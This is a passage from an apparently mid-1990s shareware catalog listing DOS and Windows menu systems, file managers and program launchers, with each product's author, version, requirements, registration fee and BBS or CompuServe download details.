124. + + Chapter 2, "Utilities" 183 + + + + Product: BATUTIL + Batch enhancement language. See full description on page 124. + + Product: C-Menu/32 + Author: C-Vision, 915-833-6778 + Version: 5.00 (08-06-94) + Needs: IBM 80386, DOS 3.0 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: SVGA monitor; Mouse. + Registration fee: $28.95 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $3.95 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: CMENU500.ZIP on BBSs (call 414-789-4210 to download it + at no charge); CMENU5.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 5 (or contact userID 72223,2016 for assistance). + SWREG#: 3174 + PsL#: 11520 + Download size: 610k (about 46 minutes with a 2400 baud modem) + Description: + A stunning easy to use 32-bit graphical (GUI) VGA only menu + system, C-Menu/32 is the Advanced Menuing System. C-Menu/32 has + many powerful and unique features. Configure an unlimited + number of entries and folders. Unique Windows application + launcher. Context sensitive on-line help. Attach icons to + entries and secure them with password protection. A novice mode + of operation. Beautiful 256 color screen savers, a QuickNote + pad, and an address book. Runs all programs while freeing all + memory. + + + Product: clySmic Icon Bar + Author: clySmic Software, 518-438-5548 + Version: 2.20 (03-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $24.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; bonus utilities; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; CB220.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76156,164 + for assistance). + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + Icon button bar program launcher. Features variable size + buttons, nestable (tree-structured) sub-bars. Uses icons from + EXE/DLL/ICOs. Can set colors, clicks to launch, vertical or + horizontal bar, many other options. Has drag n' drop program + launch, also a drag 'n' drop add-program-to-bar function. Shows + + Chapter 2, "Utilities" 184 + + + + correct icons for launched DOS programs. Has startup menu bar, + full Windows help and install, much more! + + + Product: Command Post + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 8.0 (10-31-92) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; CGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $49.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6). + Look for: CP-80H.ZIP on BBSs (call 206-935-5198 to download it at + no charge); CP-80H.ZIP on CompuServe in CIS:WILSON forum + LIBrary 15 (or contact userID 76702,1072 for assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Got a PC Magazine 1989 Product of the Year for keeping the + editors from throwing their "Windows out the window." Features + a totally user-configurable menu. You can write scripts that + automate anything and assign them to multiple levels of menus. + Gets used for much more than a simple menu program because it + comes with Wilson's Windows Interface Language-250+ commands + for automating anything from Windows. + + + Product: DaMenu + Author: Just-In-Time Computing Services, 607-539-6609 + Version: 2.01 (06-04-94) + Needs: IBM PC, DOS 3.3 or better. 314k RAM; CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 6); discounts on other products. 1-month free + upgrading allowed. + Look for: DAMENU20.ZIP on BBSs (call 607-533-7072 to download it + at no charge); DMENU2.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 5 (or contact userID 73020,3205 for assistance); + DAMENU20.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + This program has come into its own as a `truely simple' DOS + menu with features as: Submenu support, CD-ROM awareness, + online help, online registration, file browser, control panel, + application specific password protection, spacebar page + + Chapter 2, "Utilities" 185 + + + + advance, customizable screen saver/blanker & even a desktop + calculator. Other features include full mouse support, password + protection on `Exit to DOS' & menu mods, file preloading & 0k + memory overhead. + + + Product: DAYO MENU + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.14+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOME.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOME.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A simple DOS level menu system for use with the DAYO line of + Business Applications. Many features are available as menu + options, ie: 18 screen fonts, 25, 43, or 50 lines per page, + system statistics, view user manuals, and more. + + + Product: Directory Freedom + Compact file manager and application launcher. See full + description on page 9. + + Product: DOS Menu + Author: MicroFox Company, 216-659-9489 + Version: 2.20 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 192k RAM. + Strongly recommended: Hard disk. + Registration fee: $24.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + + Chapter 2, "Utilities" 186 + + + + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: DOS220.ZIP on BBSs (call 216-661-9065 to download it at + no charge); DOS220.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 73057,3113 for assistance); + DOS220.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Easy to set up and use menu system for all versions of DOS. Can + handle up to 10,000 menu entries that can run any programs, + commands, or batch files. + + + Product: Easy Menu + Author: Easy Software, 01625-614669 + Version: 6.4 (06-16-95) + Needs: IBM PC, DOS 5.0 or better. 256k RAM; Hard disk. + Registration fee: $25.00 + Registration benefits: 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 3046 + PsL#: 11493 + Download size: 153k (about twelve minutes with a 2400 baud modem) + Description: + There are many hard disk menu systems but none as + straightforward and easy to use as this. It does not have "Menu + Pages". All items are on a single scrollable menu which can + hold up to 200 items and has alphabetic search. EM Unloads + competely during the call to a menu item so there is no memory + overhead. All items can be either Open Access or Administrator + only. The system can be locked by password to the open access + items. Users without the password cannot exit to DOS. + + Chapter 2, "Utilities" 187 + + + + Product: Folders + Author: Sloop Software, 719-260-0433 + Version: 3.4d (01-12-92) + Needs: IBM AT (80286), Windows 3.0 or better. 100k RAM; EGA + monitor; Hard disk. + Strongly recommended: Modem. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; FOLDER.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 72540,144 + for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Gives you the ability equivalent to being able to create + subgroups within Program Manager groups. Create a tree + structure of groups, folders and subfolders. Features include + password protection; multi-select capability adding, deleting, + moving or copying items; display items as icons or using text + only. + + + Product: HandyDOS + File/disk, prof batching, video & menu utils. See full + description on page 140. + + Product: HDM - Hard Disk Menu + Author: MicroFox Company, 216-659-9489 + Version: 5.01 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 320k RAM. Uses 0K (no bytes) + when running a program/command/batch file. + Strongly recommended: Hard disk; Hayes-compatible modem; Mouse. + Registration fee: $50.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 1-month limited return + policy; LAN license; site license; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. 1-month free upgrading allowed. + Look for: HDM501.ZIP on BBSs (call 216-661-9065 to download it at + no charge); HDM501.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 5 (or contact userID 73057,3113 for assistance); + HDM501.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A DOS shell that hides the underlying operating system from + uninitiated users, yet does not get in the way of expert users. + Features: network & mouse support, multi-level security system, + + Chapter 2, "Utilities" 188 + + + + usage logging and reporting, phone dialer, variable screen + blanker, automatic logon & logoff, timed execution, multi-user + log on/off with passwords, extensive on-line help, file and + directory pick lists, user defined logo screen, DOS window, + pass keystrokes to user programs, 260,000 menu entries, not a + TSR. + + + Product: LAN Menu + Local Area Network menu for DOS based LANs. See full + description on page 436. + + Product: LegRoom + Make any program a TSR, swap to EMS/XMS/disk. See full + description on page 117. + + Product: New Menus for Windows + Author: Dipl.Ing. Roger Rene Kommer, 910-791-7052 + Version: 1.41 (11-29-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: $20.00 + Registration benefits: lifetime unlimited BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: NMFW141E.ARJ on BBSs (call 49-561-5740777 to download + it at no charge); NM141E.E on CompuServe in CIS:WINSHARE forum + LIBrary 9 (or contact userID 100412,3624 for assistance). + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A Win-shell similar to the UNIX X-Windows Manger OpenLook, + Motif and the 'Chicago' GUI. With a graph. popup menu for a + quick access to apps docs, directories, tasks and more. + Enhances window managment with a Virtual Desktop, layout + functions and enhanced system menu. Provides customizable + context senstive menus. Every menu, even apps menus, can be + stuck onto the desktop. Multi-user configuration. + + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 437. + + Chapter 2, "Utilities" 189 + + + + Product: Open Menu + Author: P. C. Softsmith, 604-433-5189 + Version: 2.5 (03-18-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: DBZ**.ZIP on BBSs (multiple files). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Flexible fast general purpose menu program. Easily used batch + file like script language (compatible with teleshare/dos) with + many commands per menu entry. User defined grouping. User + changeable help and can be used as on-line help system, or + reference system. Autoloading up to 9999 menu entries in + standard dBase format. Includes teleshare gather remote file + management and support. + + + Product: QCDRUN + Author: QUART, Inc., 305-967-6853 + Version: 1.0B (06-05-93) + Needs: IBM AT (80286), Windows 3.1 or better. 256k RAM; VGA + monitor; Hard disk. CD-ROM drive with MSCDEX 2.2. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $1.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; QCDV10.EXE on CompuServe + in CIS:CDROM forum LIBrary 4 (or contact userID 72376,526 for + assistance). + Download size: 412k (about 31 minutes with a 2400 baud modem) + Description: + Establishes a database of available CD-ROMs with a cross- + referenced lookup for installed programs and routines necessary + to run the CD-ROMs. Accesses the CD-ROM in the drive, + identifies the CD-ROM, loads and runs the CD-ROM software + without additional user activity. If the CD-ROM presents + several options, this program presents a menu of those options + to simplify the user's choice and access. Includes database + installation and maintenance utilities and help files. + + + Product: UltiMenu + Menu system for DOS programs. See full description on + page 200. + + Chapter 2, "Utilities" 190 + + + + 2.7.2 File managers + + Product: 4FILES [***] + File manager, annotator and program launcher. See full + description on page 35. + + Product: CMFiler + Author: NoVaSoft, 703-221-1833 + Version: 5.36s (08-15-94) + Needs: IBM PC, DOS 3.0 or better. 232k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 12 months of phone, CompuServe, mail support; bonus + utilities; disks of other shareware; discounts on other + products; registration commissions. 1 free update disk(s) sent + out. + Look for: CF536S.ZIP on BBSs (call 703-680-9269 to download it at + no charge); CMFILE.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 5 (or contact userID 72130,1400 for assistance); + CMFILER.ZIP on GEnie in IBMPC forum LIBrary 5. + SWREG#: 15 + PsL#: 10657 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + Acclaimed by PC Magazine, ZiffNet Threads, DOS 6 Secrets and + Novell DOS 7 Unleashed. A disk/file manager with side-by-side + display of directories or trees. Full suite of file/dir/tree + structure services, incl "prune-and-graft"; built-in editor, + file and text finders, notepad for dir/file notes, application + launcher, background print spooler, floppy copier and + formatter. Intuitive command syntax, mouse and VGA 43/50-line + support, small and fast. Great for beginners and developers + alike. + + + Product: Command Post + Grand old lady of Windows shells. See full description on + page 184. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 17. + + Product: ExamineZip + Text retrieval program for ZIP archives. See full description + on page 18. + + Chapter 2, "Utilities" 191 + + + + Product: File Manager Jr. + Author: Charles R. Maher, 208-664-3864 + Version: 1.2 (12-07-94) + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; discounts on upgrades. + Look for: FMANJR12.ZIP on BBSs. + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + A file manager for WinWord 6.0. Perform more than a dozen + file-management operations without having to switch to the + Windows File Manager. Open, move, copy, delete and undelete + files in any number of Word subdirectories and sub- + subdirectories. Create, rename and delete directories. + + + Product: File Maven + Author: Kent Briggs + Version: 3.0 (03-14-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + CompuServe, mail support; discounts on upgrades. Parallel link + cable for file transfers. + Look for: FMAV30.ZIP on BBSs. + SWREG#: 5014 + PsL#: 11917 + Download size: 166k (about 13 minutes with a 2400 baud modem) + Description: + An advanced DOS file manager and file transfer utility. + Features: Dual dir/pull down menus/50-line support, LapLink- + style file transfers via cable, ZIP/LHA/ARJ compressed file + support, ASCII/hex file viewer and text editor, file search, + split/join, date stamping, Blowfish encryption and secure file + wipe, context sensitive hypertext help system, Directory Maven + tree scanning/quick chdir, and much more! + + Chapter 2, "Utilities" 192 + + + + Product: FILE_MAN + Author: MicroMetric, 813-377-2515 + Version: 4.30 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: FMAN430.ZIP on BBSs (call 813-371-2490 to download it + at no charge). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + A menu driven utility program that aids in managing disk files. + Directory and file names are displayed in sorted order with + file names sorted by name, extension, date or size. Single + files or groups may be quickly marked and then acted upon. The + actions include copy, move, spawn, append, erase, rename, + change attribute status, display, print and locate. Features + include context sensitive help, macro procedures, directory + tree, diskette labels and program parameter customization. + + + Product: Keyed File System (OS/2) + Subroutines for keyed file support in OS/2. See full + description on page 454. + + Product: LOCATE + File find & maintenance for DOS/NetWare. See full description + on page 19. + + Product: PMZIP + OS/2 Presentation Manager ZIP shell. See full description on + page 50. + + Chapter 2, "Utilities" 193 + + + + Product: PocketD Plus + Author: PocketWare, +44-81-203-3731 + Version: 4.2 (11-05-94) + Needs: IBM PC, DOS 2.1 or better. 65k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $49.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 24 months of unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Look for: POCK.ZIP on BBSs (call 619-755-7357 to download it at + no charge); POCK.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 3 (or contact userID 100031,3537 for assistance); POCK.ZIP on + GEnie in IBMPC forum LIBrary 0. + SWREG#: 1017 + PsL#: 10474 + Download size: 167k (about 13 minutes with a 2400 baud modem) + Description: + What PC's "Best Utility 1994" joint runner-up with Stacker 4.0 + and PsL's "Best Utility 1992". Tiny but superb color dir + lister, file COPY and immensely powerful file manager allowing + the user to quickly & easily carry out automated tasks either + too difficult or impossible by other means. Over 220+ options + from command-line or menu-driven interface. Full arch/dir + browsing, ZIP,ARC,PAK,ZOO,ARJ,LZH,SFX, COPY (23 options), + multiple display/exec template(s) (50 params), OS/2 & 4DOS, & + much more. + + + Product: QFiler + Author: Jamestown Software, 608-271-2090 + Version: 3.2 (07-15-91) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: Printed manual and disk; phone/BBS/ + newsletter support. + Look for: QF*.* on BBSs (multiple files) (call 608-271-3685 to + download it at no charge); QF32*.EXE on CompuServe in + CIS:IBMSYS forum LIBrary 5 (or contact userID 74275,745 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + This powerful file manager displays two sorted directories + side-by-side. Copy, rename, move or delete both files and + directories. View file contents in ascii or hex. View and print + directory tree. Find files on any drive. Create and remove + subdirectories. Locate duplicate files. Set or clear file + attributes. Change time/date stamps. Simplify use of file + compression utilities like LHA and PKZip. Rename disk volume + labels. Undelete or edit files. XCopy directories. Send files + to print queue. + + Chapter 2, "Utilities" 194 + + + + Product: QuickDir + DOS and archive shell. Custom directory tree. See full + description on page 11. + + Product: SmartCat Plus + The ultimate disk (floppy/hard/CD) cataloger. See full + description on page 14. + + Product: ToolBOX + A simple yet uniquely powerful DOS shell. See full description + on page 25. + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 122. + + Product: UltiMenu + Menu system for DOS programs. See full description on + page 200. + + Product: USEMGR + Know how many times each file on disk is used. See full + description on page 25. + + Product: Windev - Windows Developer + Editor/programmer's tools for Windows 3.1. See full + description on page 495. + + Product: Windev - Windows NT Developer + Editor/programmer's tools for Windows NT. See full description + on page 496. + + Product: WinZip + Windows ZIP util w/drag & drop, built-in ZIP. See full + description on page 53. + + Chapter 2, "Utilities" 195 + + + + Product: WizManager + Author: Mijenix, 608-277-1971 + Version: 1.1c (08-02-93) + Needs: IBM AT (80286), Windows 3.1 or better. CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $39.95 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + phone, fax, CompuServe, newsletter, mail support; all ASP-wide + offers (see page 6); disks of other shareware. + Look for: WIZMGR.DLL on BBSs (call 414-789-4337 to download it at + no charge); WIZMGR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 75430,1545 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Just about all the features a user could wish for in Windows + File Manager are finally available in this innovative and + powerful add-on. Install with its slick installation program + and get: + 1. Ease-of-use of a colorful, scrollable buttonbar + 2. Command line box which allows you to enter DOS commands + such as COPY, DEL, etc, within File Manager + 3. Many great utilities like Print Directory, Print Tree, + Lock, System & Disk Information, Scripts, etc. + Oustanding tool. Try it! + + + Product: x-FILE3 + Network file management system. See full description on + page 431. + + Product: XDIR + Attach descriptive comments to DIR displays. See full + description on page 26. + + Chapter 2, "Utilities" 196 + + + + 2.7.3 Combined MS/FMs + + Product: ABmenu + Author: Abri Technologies, Inc. + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 10k RAM. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support; bonus utilities; discounts on + upgrades; registration commissions. + Look for: availability unknown on BBSs; ABMENU.EXE on CompuServe + in CIS:IBMSYS forum LIBrary 5 (or contact userID 72345,1623 for + assistance). + Download size: 126k (about ten minutes with a 2400 baud modem) + Description: + A simple, fast, stay-in-DOS program menu and/or drive/directory + hoper. Directories, programs and descriptions easily added or + deleted from menu list - right on the DOS line with the simple + "D" command. No editing, compiling, etc. + + + Product: BCM Menu System + Author: BCM Software, 313-292-6097 + Version: 2.2 (01-09-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $49.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 6); + discounts on upgrades. + Look for: 22BCM*.ZIP on BBSs (multiple files); BCM*.EXE on + CompuServe in CIS:IBMSYS forum LIBrary 5 (multiple files) (or + contact userID 71470,2225 for assistance). + SWREG#: 1275 + PsL#: 10913 + Download size: 473k (about 35 minutes with a 2400 baud modem) + Description: + Featuring: easy installation & use, online help, encrypted + password protection, automatic screen save, uses less than 1k + mem while running programs, can launch windows, dual directory + and tree windows, fast disk duplication, file find, support for + ZIP, ARC, LZH & ARJ compress methods, uses you virus scanner to + scan compressed files, can use other utilities, text editor + with clipboard an much much more. + + + Product: Double Directory + File/disk manager; 2 directories side-by-side. See full + description on page 36. + + Chapter 2, "Utilities" 197 + + + + Product: ELFTREE + Author: Elvish Consulting, 217-698-8600 + Version: 3.01S (12-28-93) + Needs: IBM PC, DOS 2.0 or better. 300k RAM. + Strongly recommended: Hard disk. + Registration fee: 50.00Y + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited tollfree 800# phone, fax, + BBS, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 6); discounts on other products. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; ET301.ZIP on CompuServe + in CIS:IBMSYS forum LIBrary 5 (or contact userID 73077,3605 for + assistance). + Download size: 209k (about 16 minutes with a 2400 baud modem) + Description: + Packs 100s of file, directory and program management utilities + into a compact, slick package. Mouse support! Can remember tree + maps for CDROM disks, which eliminates the need to rescan for + each access. Support for user-defined menus of up to 100 items + per menu, with submenus 10 levels deep. Fast, works on large + hard disks or network machines with ease. Can prune directories + or graft them from one drive to another (even on networks). + + + Product: ENTER-EASE + Author: KAYL SOFTWARE + Version: 1.1 (09-29-94) + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, mail support; lifetime return + policy; bonus utilities; all ASP-wide offers (see page 6). + Attractive carrying case. + Look for: ENTER_E.ZIP on BBSs; ENTERE.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 5; ENTER_E.ZIP on GEnie in IBMPC forum + LIBrary 15. + PsL#: 11567 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Makes DOS better than Windows. This DOS shell lets you manage + your hard disk without having to learn complex commands or + answer needless questions. It displays the key needed to + activate a command on the screen so there is no memorization + necessary. All the keys are centered around the numeric keypad + so if you can't type you can still initiate commands quickly, + much faster than with a mouse. You can do all your file + management, and much more, while drinking coffee! + + Chapter 2, "Utilities" 198 + + + + Product: File Commander + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 2.0K (10-31-92) + Needs: Unknown. 100k RAM. + Registration fee: $49.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + phone, fax, BBS, CompuServe, mail support; 3-month return + policy; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware. + Look for: FC-20K.ZIP on BBSs (call 206-935-5198 to download it at + no charge); FC-20K.ZIP on CompuServe in CIS:WILSON forum + LIBrary 0 (or contact userID 76702,1072 for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + The best extender for the Win 3.1 File Manager. It adds one to + four menu items to the file Manager menu bar. From one top + level menu item, you can make up to 99 menu items spread up to + four levels deep. The menu items, when selected, execute our + Windows Interface Language menu scripts. The menu items can + gather filenames and other information into listboxes for the + user to choose from, perform arithmetic, parse strings, move + and and resize windows, and send keystrokes. + + + Product: Hard Disk Director + Author: Canyon Software, 415-382-7999 + Version: 5.2 (03-15-92) + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Registration fee: $40.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support. + Look for: availability unknown on BBSs; HDD1.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 5 (multiple files) (or contact userID + 74774,554 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A series of programs making up a complete hard disk menu, shell + and file manager. + DL.EXE full featured shell. You can mark selected + directories or files for copying, moving or + removing. + DB.EXE gives you a sorted file list for any directory. + DA.EXE shows you all the files on a particular drive or + drives. + DM full featured hard disk menu. You can add up to + 20 entries to the main menu and have unlimited + submenus of up to 20 entries each. + + + Product: Katelin Comment Manager + Full featured file/comment manager. See full description on + page 62. + + Chapter 2, "Utilities" 199 + + + + Product: UltiMenu + Author: Ron Janorkar, 212-334-1243 + Version: 1.00 (08-19-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Hayes-compatible modem; + Mouse. + Registration fee: $25.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support. + Look for: UMENU100.ZIP on BBSs (call 718-716-6198 to download it + at no charge); UMENU100.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Removes itself completely from system memory for running + programs; 18 categories with up to 18 programs per category are + supported; mouse support; fully configurable; context sensitive + on-line help; offers many built in utilities such as a file + handler, screen blanker, contact manager and label manager. + + + Product: XMENU + Author: David M. Dibble + Version: 1.0a (11-22-93) + Needs: IBM PC, DOS 2.0 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $12.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of mail support; bonus utilities. 1 free update disk(s) + sent out. + Look for: XMENU10A.ZIP on BBSs. + Download size: 17k (about two minutes with a 2400 baud modem) + Description: + Small, fast shell for LHA, PKZIP, ARJ, ZOO, PAK, PKPAK and ARC. + Self-lists the contents of archives; shells to appropriate + archiver to view, extract, delete, or freshen files. File + manager interface, with tagging, sorting, and searching. Fully + customizable by editing text of XMENU.CFG. Converts to self- + extracting archives. Will salvage damaged LZH files that LHA + itself cannot read. Works on any PC compatible system. + + + 2.7.4 MS/FMs for developers + + Product: ELFTREE + Packs 100s of file/dir/pgm management utils. See full + description on page 196. + + Chapter 2, "Utilities" 200 + + + + 2.7.5 Work environment managers + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 130. + + Product: Button Manager for Windows + Author: AKC Applied Knowledge Corporation, 613-841-6020 + Version: 1.3b (01-10-95) + Needs: IBM 80386, Windows 3.1 or better. Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, fax, CompuServe, mail support; 3-month limited return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: SMLBMG.ZIP on BBSs; SMLBMG.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 9 (or contact userID 70252,1364 for + assistance). + SWREG#: 2823 + PsL#: 11559 + Download size: 155k (about twelve minutes with a 2400 baud modem) + Description: + A multi-icon-bar Windows utility that provides quick access to + applications. Program Manager groups and icons are + automatically reflected; each group becomes a resizable button + bar that can separately be opened and placed anywhere on the + desktop. Program desc shown in title bar as cursor glides over + each icon. Designate some or all to stay on top, min, max, or + cascade. Desktop set-up remembered. Professional installation + program sets up application and icons in one minute. No other + setup required. + + + Product: CMFiler + File manager. See full description on page 190. + + Product: 